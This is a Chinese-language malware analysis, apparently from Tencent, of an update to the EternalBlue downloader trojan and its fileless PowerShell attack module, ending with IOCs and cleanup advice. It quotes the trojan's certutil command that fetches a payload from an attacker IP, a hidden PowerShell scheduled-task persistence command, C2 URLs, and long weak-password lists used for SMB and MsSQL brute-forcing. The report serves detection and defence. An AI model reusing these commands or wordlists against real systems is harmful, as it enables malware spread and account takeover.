永恒之蓝下载器木马升级更新没完没了

腾讯安全御见威胁情报中心于2019年3月8日发现曾利用驱动人生公司升级渠道的永恒之蓝下载器木马再次更新。此次更新仍然在于攻击模块，但是其特点在于，攻击模块不再由此前植入的母体PE文件进行释放，而是转为由感染后机器上安装的Powershell后门进行下载。

通过分析发现，此次新启用的PE攻击模块下载地址同时还负责Powshell脚本攻击模块的下载，导致已感染的机器对其他机器发起PE文件攻击和“无文件”攻击。通过对比分析还发现“永恒之蓝”木马下载器黑产团伙使用的Powershell攻击代码与腾讯安全御见威胁情报中心2018年9月发现的Mykings僵尸网络变种攻击代码有诸多相似之处，因此推测两者具有某种联系。

“永恒之蓝”木马下载器黑产团伙时间线：

PE文件攻击

下载指令：

certutil.exe  -urlcache -split -f hxxp://27.102.107.137/ii.exe i.exe

md5: def0e980d7c2a59b52d0c644a6e40763

该文件通过被感染机器的Powershell后门进行下载，保存为i.exe执行，其功能和此前多次更新的攻击模块C:\Windows\Temp\svchost.exe相同，该文件同样由Pyinstaller打包生成，集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击，同时使用黑客工具mimiktaz、psexec进行辅助攻击，分析其代码另发现以下几处变化：

1、对主程序的 Python 代码整体经过Base64、bz2算法进压缩编码，运行时先解码。

2、对用于SMB、MsSQL爆破的弱口令进行更新，新增了13条弱口令：

'database',

'saadmin',

'sql2000',

'admin123',

' [email protected] ',

'sql123',

'sasasa',

'adminsa',

'sql2010',

'sa12345',

'sa123456',

'saadmin',

'sqlpass'

3、从新的地址下载恶意代码执行：

·hxxp://info.haqo.net/e.png?id=

· hxxp://info.beahh.com/e.png?id=

· hxxp://info.abbny.com/e.png?id=

“无文件”攻击。

通过已感染机器上的Powershell后门下载以下脚本代码执行：

hxxp://v.beahh.com/ipc?low1，该代码为经过多重混淆的Powershell脚本，解密后发现，其主要功能为下载另一脚本hxxp://27.102.107.137/new.dat?pebb并将其安装为计划任务Credentials执行。

· 计划任务名：Credentials

· 启动程序：powershell -nop -w hidden -ep bypass -f %appdata%\Microsoft\cred.ps1

· 触发器：在首次执行当天触发后，无限期每隔一小时执行一次。

该计划任务执行的Powershell文件cred.ps1，该文件同样经过多重混淆，解密后分析发现其集成了端口扫描、SMB爆破、永恒之蓝漏洞攻击等攻击方法，并且攻击成功后会在目标机器上传启动项。

永恒之蓝漏洞攻击。

SMB弱口令爆破。

攻击后上文件到传启动目录。

此次更新后，木马脱离了原来的PE文件母体，直接通过已感染机器上安装的后门下载攻击模块，并且同时更新PE攻击模块和“无文件”形式的攻击模块，导致其拥有了更大的传播能力。

通过对比还发现，该木马使用的“无文件”攻击代码与腾讯安全御见威胁情报中心在2018年9月发现的Mykings僵尸网络变种（https://www.freebuf.com/column/183705.html）使用的攻击方法有较多相似之处，包括相同的攻击利用函数名eb7()，eb8()，创建计划任务的启动目录都为%appdata%\Microsoft\，都会在攻击成功后上传文件到菜单启动目录等，因此推测其与Myings僵尸网络幕后团伙有某种联系。

安全建议

1.服务器暂时关闭不必要的端口（如135、139、445），方法可参考： https://guanjia.qq.com/web_clinic/s8/585.html

2.服务器使用高强度密码，切勿使用弱口令，防止黑客暴力破解；

3.使用杀毒软件拦截可能的病毒攻击；

4.企业用户可部署腾讯御界高级威胁检测系统防御可能的黑客攻击。

5.中毒电脑可参考以下提示手动清理：

删除文件

· %appdata%\Microsoft\cred.ps1

删除以下计划任务：

· 计划任务名：Credentials

· 启动程序：powershell -nop -w hidden -ep bypass -f %appdata%\Microsoft\cred.ps1

删除菜单启动目录文件：

· run.bat、FlashPlayer.lnk、flashplayer.tmp、sign.txt

IOCs

Md5

def0e980d7c2a59b52d0c644a6e40763

23196de0ede25fb9659713fa6799f455

ce924b12ffc55021f5c1bcf308f29704

2fbce2ecf670eb186c6e3e5886056312

IP

27.102.107.137

Domain

info.haqo.ne

info.beahh.com

info.abbny.com

v.beahh.com

URL

hxxp://info.haqo.net/e.png?id=

hxxp://info.beahh.com/e.png?id=

hxxp://info.abbny.com/e.png?id=

hxxp://27.102.107.137/ii.exe

hxxp://v.beahh.com/ipc?low1

hxxp://27.102.107.137/new.dat?pebb

弱口令：

"123456",

"password",

"PASSWORD",

"football",

"welcome",

"1",

"12",

"21",

"123",

"321",

"1234",

"12345",

"123123",

"123321",

"111111",

"654321",

"666666",

"121212",

"000000",

"222222",

"888888",

"1111",

"555555",

"1234567",

"12345678",

"123456789",

"987654321",

"admin",

"abc123",

"abcd1234",

" [email protected] ",

" [email protected] ",

" [email protected] ",

" [email protected] ",

" [email protected] ",

" [email protected] ",

" [email protected] ",

" [email protected] ",

"[email protected]$$w0rd",

"[email protected]$$word",

"[email protected]$$w0rd",

"iloveyou",

"monkey",

"login",

"passw0rd",

"master",

"hello",

"qazwsx",

"password1",

"qwerty",

"baseball",

"qwertyuiop",

"superman",

"1qaz2wsx",

"fuckyou",

"123qwe",

"zxcvbn",

"pass",

"aaaaaa",

"love",

"administrator"

'123456',

'password',

'qwerty',

'12345678',

'123456789',

'123',

'1234',

'123123',

'12345',

'12345678',

'123123123',

'1234567890',

'88888888',

'111111111',

'000000',

'111111',

'112233',

'123321',

'654321',

'666666',

'888888',

'a123456',

'123456a',

'5201314',

'1qaz2wsx',

'1q2w3e4r',

'qwe123',

'123qwe',

'a123456789',

'123456789a',

'baseball',

'dragon',

'football',

'iloveyou',

'password',

'sunshine',

'princess',

'welcome',

'abc123',

'monkey',

'[email protected]#$%^&*',

'charlie',

'aa123456',

'Aa123456',

'admin',

'homelesspa',

'password1',

'1q2w3e4r5t',

'qwertyuiop',

'1qaz2wsx',

'sa',

'sasa',

'sa123',

'sql2005',

'1',

' [email protected] ',

'sa2008',

'1111',

'passw0rd',

'abc',

'abc123',

'abcdefg',

'sapassword',

'Aa12345678',

'ABCabc123',

'sqlpassword',

'1qaz2wsx',

'1qaz!QAZ',

'sql2008',

'ksa8hd4,[email protected]~#$%^&*()',

'4yqbm4,m`[email protected]~#$%^&*(),.; ',

'4yqbm4,m`[email protected]~#$%^&*(),.;',

'A123456',

'database',

'saadmin',

'sql2000',

'admin123',

' [email protected] ',

'sql123',

'sasasa',

'adminsa',

'sql2010',

'sa12345',

'sa123456',

'saadmin',

'sqlpass'